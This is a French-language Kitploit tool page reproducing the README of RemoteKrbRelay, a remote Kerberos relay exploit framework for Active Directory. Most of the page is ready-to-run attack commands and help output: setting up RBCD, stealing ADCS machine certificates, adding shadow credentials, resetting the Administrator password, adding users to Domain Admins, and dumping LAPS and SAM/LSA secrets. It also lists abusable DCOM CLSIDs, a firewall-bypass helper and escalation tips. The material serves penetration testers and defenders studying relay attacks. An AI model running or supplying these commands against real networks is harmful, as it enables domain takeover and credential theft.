Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
RemoteKrbRelay — Relais Kerberos distant rendu facile ! Framework avancé de relais Kerberos | Kitploit
Outils/GitHubGitHub/cicada8-research/remotekrbrelay
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationMouvement LatéralTests d'IntrusionAuthentificationRed Teaming
GitHubcicada8-research/remotekrbrelay

RemoteKrbRelay

Relais Kerberos distant rendu facile ! Framework avancé de relais Kerberos

Voir le dépôt
65095il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
root@kitploit:~
                            /\_/\____,
                  ,___/\_/\ \  ~     /
                  \     ~  \ )   XXX
                    XXX     /    /\_/\___,
                       \o-o/-o-o/   ~    /
                        ) /     \    XXX
                       _|    / \ \_/
                    ,-/   _  \_/   \
                   / (   /____,__|  )
                  (  |_ (    )  \) _|
                 _/ _)   \   \__/   (_
                (,-(,(,(,/      \,),),)

                CICADA8 Research Team
                From Michael Zhmaylo (MzHmO)

RemoteKrbRelay

Vous connaissez probablement KrbRelay et KrbRelayUp, mais que diriez-vous si cela pouvait être fait à distance ? Avec RemoteKrbRelay, cela devient une réalité.

TL;DR

En savoir plus sur CertifiedDCOM ici. CertifiedDCOM vous permet de déclencher un compte machine ADCS :

root@kitploit:~
# CertifiedDCOM (Abuse AD CS by setting RBCD)
  .\RemoteKrbRelay.exe -rbcd -victim adcs.root.apchi -target dc01.root.apchi -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -cn FAKEMACHINE$

# CertifiedDCOM (Abuse ADCS to get Machine cert)
   .\RemoteKrbRelay.exe -adcs -template Machine -victim adcs.root.apchi -target dc01.root.apchi -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3

# CertifiedDCOM (Abuse ADCS with ShadowCreds)
  .\RemoteKrbRelay.exe -shadowcred -victim adcs.root.apchi -target dc01.root.apchi -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -forceshadowcred

Il y a aussi l'exploit SilverPotato. Vous pouvez l'utiliser pour abuser des sessions. Y compris une session d'administrateur de domaine sur un hôte tiers.

root@kitploit:~
# Change user password
  .\RemoteKrbRelay.exe -chp -victim dc01.root.apchi -target dc01.root.apchi -clsid f87b28f1-da9a-4f35-8ec0-800efcf26b83 -chpuser Administrator -chppass Lolkekcheb123! -secure

# Add user to group
  .\RemoteKrbRelay.exe -addgroupmember -victim computer.root.apchi -target dc01.root.apchi -clsid f87b28f1-da9a-4f35-8ec0-800efcf26b83 -group "Domain Admins" -groupuser petka

# Dump LAPS passwords
  .\RemoteKrbRelay.exe -laps -victim mssql.root.apchi -target dc01.root.apchi -clsid f87b28f1-da9a-4f35-8ec0-800efcf26b83

# Send LDAP Whoami request from relayed user
  .\RemoteKrbRelay.exe -ldapwhoami -victim win10.root.apchi -target dc01.root.apchi -clsid f87b28f1-da9a-4f35-8ec0-800efcf26b83

# Trigger authentication from another session
  .\RemoteKrbRelay.exe -ldapwhoami -victim domainadminhost.root.apchi -target dc01.root.apchi -clsid f87b28f1-da9a-4f35-8ec0-800efcf26b83 -session 1

Détails

Maintenant, vous avez quatre dossiers devant vous :

  • Checker - ancienne version du vérificateur pour détecter les objets DCOM vulnérables ;
  • Checkerv2.0 - nouvelle version du vérificateur pour détecter les objets DCOM vulnérables ;
  • Exploit - RemoteKrbRelay.exe :)
  • FindAvailablePort - un outil pour contourner un pare-feu lors de l'utilisation de l'exploit.

Checker

Donc, commençons par Checker. Vous pouvez l'utiliser pour détecter les objets DCOM vulnérables. Un objet DCOM vulnérable peut être considéré comme tel si :

  • Le serveur COM dans lequel l'objet DCOM est exécuté doit être exécuté en tant qu'un autre utilisateur ou en tant que système. Mais jamais en tant que NT AUTHORITY\LOCAL SERVICE, car il utilise des identifiants vides pour s'authentifier depuis le réseau ;
  • Vous devez avoir les autorisations RemoteLaunch, RemoteActivation. Il s'agit de LaunchPermissions ;
  • Le niveau d'emprunt d'identité (impersonation) doit être RPC_C_IMP_LEVEL_IDENTIFY ou supérieur. RPC_C_IMP_LEVEL_IDENTIFY est la valeur par défaut ;
  • Vous devez avoir les autorisations RemoteAccess (ou elles doivent être vides). Il s'agit de AccessPermission.

Pour une détection facile, vous pouvez utiliser Checkerv2.0. Il prend en charge la sortie aux formats csv et xlsx.

root@kitploit:~
PS A:\ssd\Share\RemoteKrbRelay\Checkerv2.0\Checkerv2.0\bin\Debug> .\Checkerv2.0.exe -h

                            /\_/\____,          /\     /\
                  ,___/\_/\ \  ~     /            \ _____\
                  \     ~  \ )   XXX               (_)-(_)
                    XXX     /    /\_/\___,      Checkerv2.0 Collection
                       \o-o/-o-o/   ~    /
                        ) /     \    XXX
                       _|    / \ \_/
                    ,-/   _  \_/   \
                   / (   /____,__|  )
                  (  |_ (    )  \) _|
                 _/ _)   \   \__/   (_
                (,-(,(,(,/      \,),),)

                CICADA8 Research Team
                From Michael Zhmaylo (MzHmO)

Check.exe
Small tool that allow you to find vulnerable DCOM applications

[OPTIONS]
-outfile : output filename
-outformat : output format. Accepted 'csv' and 'xlsx'
-showtable : show the xlsx table when it gets filled
-h/--help : shows this windows

Exemple :

root@kitploit:~
.\Checkerv2.0.exe -outfile win10 -outformat xlsx

Et vous recevrez ce résultat : изображение

Les colonnes contiendront les CLSID des objets DCOM, les noms, ainsi que LaunchPermission et AccessPermission. изображение

Essayez de rechercher les objets sppui (CLSID {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}, APPID {0868DC9B-D9A2-4f64-9362-133CEA201299}) et CertSrv Request (CLSID {d99e6e74-fc88-11d0-b498-00a0c90312f3}) et comprenez pourquoi ils sont vulnérables.

N'utilisez pas Checker, utilisez uniquement Checkerv2.0 svp :3

FindAvailablePort

Un petit outil pour découvrir un port sur lequel déployer un serveur DCOM malveillant. Voir les détails ici (Remote -> Local Potato).

изображение

Entraînez-vous à utiliser le concept de port local. Réécrivez RemotePotato0 pour un port local. Croyez-moi, c'est utile.

Exploit

J'ai ajouté pas mal de fonctionnalités différentes à l'exploit. Notez qu'il fournit suffisamment de fonctionnalités pour abuser des objets DCOM. J'ai également listé quelques CLSID dans l'aide pour l'abus. Ces CLSID étaient publiquement connus, il n'y avait simplement pas de POC pour les abuser. Il y a pas mal d'objets DCOM vulnérables, travaillez avec le vérificateur et trouvez-les tous !

root@kitploit:~
PS A:\ssd\Share\RemoteKrbRelay\Exploit\RemoteKrbRelay\bin\x64\Debug> .\RemoteKrbRelay.exe -h

                            /\_/\____,
                  ,___/\_/\ \  ~     /
                  \     ~  \ )   XXX
                    XXX     /    /\_/\___,
                       \o-o/-o-o/   ~    /
                        ) /     \    XXX
                       _|    / \ \_/
                    ,-/   _  \_/   \
                   / (   /____,__|  )
                  (  |_ (    )  \) _|
                 _/ _)   \   \__/   (_
                (,-(,(,(,/      \,),),)

                CICADA8 Research Team
                From Michael Zhmaylo (MzHmO)

[HELP PANEL]
        RemoteKrbRelay.exe
        Relaying Remote Kerberos Auth by easy way
        Usage: RemoteKrbRelay.exe [ATTACKS] [REQUIRED OPTIONS] [OPTIONAL PARAMS] [ATTACK OPTIONS] [SWITCHES]

[ATTACKS] (one required!)
        -rbcd : relay to LDAP and setup RBCD
        -adcs : relay to HTTP Web Enrollment and get certificate
        -smb : relay to SMB
        -shadowcred : relay to LDAP and setup Shadow Credentials
        -chp : relay to LDAP and change user password
        -addgroupmember : relay to LDAP and add user to group
        -laps : relay to LDAP and extract LAPS passwords
        -ldapwhoami : relay to LDAP and get info about relayed user

[REQUIRED OPTIONS]
        -target : relay to this target
        -victim : relay this computer
        -clsid : target CLSID to abuse

[OPTIONAL PARAMS]
        -spn : with ticket on this SPN victim will come to us. For ex: ldap/dc01.root.apchi - tkt for RBCD mode , http/dc01.root.apchi - tkt for ADCS mode
        -d/--domain : current (target) domain
        -dc/--domaincontoller : target DC
        -local : current computer hostname. This host will be in OBJREF.

[ATTACK OPTIONS]
        [SMB OPTIONS (Relay to SMB)]
        --smbkeyword : specify 'secrets' or 'service-add' or 'interactive'
        --servicename : service-add cmdlet. Name of new service
        --servicecmd : service-add cmdlet. Commandline of the service

        [ADCS OPTIONS (Relay to HTTP)]
        -template : ADCS Mode only. Template to relay to

        [RBCD OPTIONS (Relay to LDAP)]
        -c/--create :  Create new computer
        -cn/--computername :  Computer name that will be written to msDs-AllowedToActOnBehalfOfOtherIdentity
        -cp/--computerpassword : requires -c switch. Password for new computer
        --victimdn : DN of victim computer

        [CHANGE PASSWORD OPTIONS (Relay to LDAP)]
        -chpuser : the name of the user whose password you want to change
        -chppass : new password

        [ADD GROUP MEMBER OPTIONS (Relay to LDAP)]
        -group : group name
        -groupuser : user to add to the group
        -groupdn : target group DN
        -userdn : target user DN

        [SHADOWCRED OPTIONS (Relay to LDAP)]
        -forceshadowcred : force shadow creds

        [LAPS OPTIONS (Relay to LDAP)]
        -lapsdevice : Optional param. Target computer hostname to dump laps from

[SWITCHES]
        -h/--help : show help
        -debug : show debug info
        -secure : use SSL for connection to LDAP/HTTP/etc
        -p/--port : port to deploy rogue dcom server
        -session : cross-session activation. Useful when instantiating com objects with RunAs value as "The Interactive User"
        -module : default "System". It is for firewall bypass

[EXAMPLES]
        [1] Trigger kerberos authentication from adcs.root.apchi (-victim). Then relay to dc01.root.apchi (-target). And setup RBCD (u can optionally provide -dc because setuping RBCD requires connection to ldap on DC) from adcs.root.apchi to FAKEMACHINE$ (-cn). As a result u can pwn adcs.root.apchi from FAKEMACHINE$ through RBCD
        .\RemoteKrbRelay.exe -rbcd -victim adcs.root.apchi -target dc01.root.apchi -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -cn FAKEMACHINE$

        [2] Trigger krb auth from dc01.root.apchi (-victim). Then relay to win10.root.apchi (-target) and open interactive SMB Console.
        .\RemoteKrbRelay.exe -smb --smbkeyword interactive -victim dc01.root.apchi -target win10.root.apchi -clsid <IDK CLSID FOR THAT xD>

        [3] Trigger krb auth from dc01.root.apchi (-victim). Then relay to win10.root.apchi (-target) and dump SAM/LSA secrets from win10.root.apchi.
        .\RemoteKrbRelay.exe -smb --smbkeyword secrets -victim dc01.root.apchi -target win10.root.apchi -clsid <IDK CLSID FOR THAT xD>

        [4] Trigger krb auth from dc01.root.apchi (-victim). Then relay to win10.root.apchi (-target) and create service.
        .\RemoteKrbRelay.exe -smb --smbkeyword service-add --servicename Hello --servicecmd "c:\windows\system32\calc.exe" -victim dc01.root.apchi -target win10.root.apchi -clsid <IDK CLSID FOR THAT xD>

        [5] Get machine certificate from kerberos relay
        .\RemoteKrbRelay.exe -adcs -template Machine -target dc01.root.apchi -victim win10.root.apchi -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8

        [6] Shadow Creds
        .\RemoteKrbRelay.exe -shadowcred -victim dc01.root.apchi -target dc01.root.apchi -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -forceshadowcred

        [7] Change user password
        .\RemoteKrbRelay.exe -chp -victim dc01.root.apchi -target dc01.root.apchi -clsid f87b28f1-da9a-4f35-8ec0-800efcf26b83 -chpuser Administrator -chppass Lolkekcheb123! -secure

        [9] Dump LAPS passwords
        .\RemoteKrbRelay.exe -laps -victim dc01.root.apchi -target dc01.root.apchi -clsid f87b28f1-da9a-4f35-8ec0-800efcf26b83

        [10] Send LDAP Whoami request from relayed user
        .\RemoteKrbRelay.exe -ldapwhoami -victim dc01.root.apchi -target dc01.root.apchi -clsid f87b28f1-da9a-4f35-8ec0-800efcf26b83

        [11] Trigger authentication from another session
        .\RemoteKrbRelay.exe -ldapwhoami -victim dc01.root.apchi -target dc01.root.apchi -clsid f87b28f1-da9a-4f35-8ec0-800efcf26b83 -session 1

[?] Interesting CLSIDs to use
dea794e0-1c1d-4363-b171-98d0b1703586 - Interactive User. U can use with -session switch. U should be in NT AUTHORITY\Interactive
f87b28f1-da9a-4f35-8ec0-800efcf26b83 - Interactive User. U can use with -session switch. U should be in Distributed COM Users or Performance Log Users
3ab092c4-de6a-4cd4-be9e-fdacdb05759c - System account. On victim computer should be installed AD CS
6d5ad135-1730-4f19-a4eb-3f87e7c976bb - System account. On victim computer should be installed AD CS

Exemples

Je vous suggère d'examiner quelques-unes des attaques :

  • RBCD - relais vers LDAP et configuration de RBCD. Pasted image 20240520155730

  • HTTP ADCS - relais vers le service d'inscription web. Pasted image 20240520155547

  • ShadowCred - relais vers LDAP et configuration de ShadowCreds. Pasted image 20240529141710

  • Ajouter un utilisateur à un groupe Pasted image 20240529170057

  • Demande LDAP Whoami - Il est pratique de combiner avec la fonctionnalité de bruteforce de CLSID. Vous pouvez découvrir quel utilisateur vous déclenchez. Essayez de déclencher les cinq premières sessions sur toutes les machines du domaine. Wow, c'est ça, un administrateur de domaine en cinq minutes ? :) Pasted image 20240530214447

Prend en charge l'activation inter-sessions à l'aide de -session : Pasted image 20240530220634

Pasted image 20240530220705

Aussi LAPS, changement de mot de passe utilisateur, smb....

Vidéo DÉMO :

  • https://youtu.be/1zvycrTTgDU

Liste des tâches à faire

  • Dumper les GMSA
  • Relais Exchange vers Exchange
  • Bruteforce de CLSID
  • Relais avec identifiants supplémentaires

Astuces

  • Relayer l'authentification initiale de la requête OXID. Lien. Vous pouvez tester :
root@kitploit:~
.\RemoteKrbRelay.exe -ldapwhoami -victim win10.vostok.street -target dc01.vostok.street -clsid f87b28f1-da9a-4f35-8ec0-800efcf26b83 -local dc011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAAA

# but I haven't implemented the relay from Initial OXID Request yet. Do it BRO! :)
# dc011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAAA <- this is DNS A record that points to kali (thx to CredMarshalTargetInfo() because i can receive tkt on RPCSS/dc01)
  • Vous pouvez obtenir un TGT dans AP-REQ. Et si la cryptographie DES était utilisée ?
root@kitploit:~
.\RemoteKrbRelay.exe -rbcd -victim win10.vostok.street -target dc01.vostok.street -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -spn krbtgt/root.apchi -cn FAKEMACHINE$

Conclusion

La vulnérabilité est assez sérieuse. Notez que ceci est le POC minimal. Vous devriez l'affiner si vous voulez l'utiliser de manière stable dans vos projets Red Team.

Remerciements

  • Les dépôts KrbRelay et KrbRelayUp, avec leur aide j'ai pu comprendre le relais Kerberos
  • Présentation BH Asia 2024
  • Silver Potato

Merci de ne pas avoir publié le POC sur CertifiedDCOM et SilverPotato, j'étais impatient de les réaliser à partir de ces articles :D

Télécharger l’outil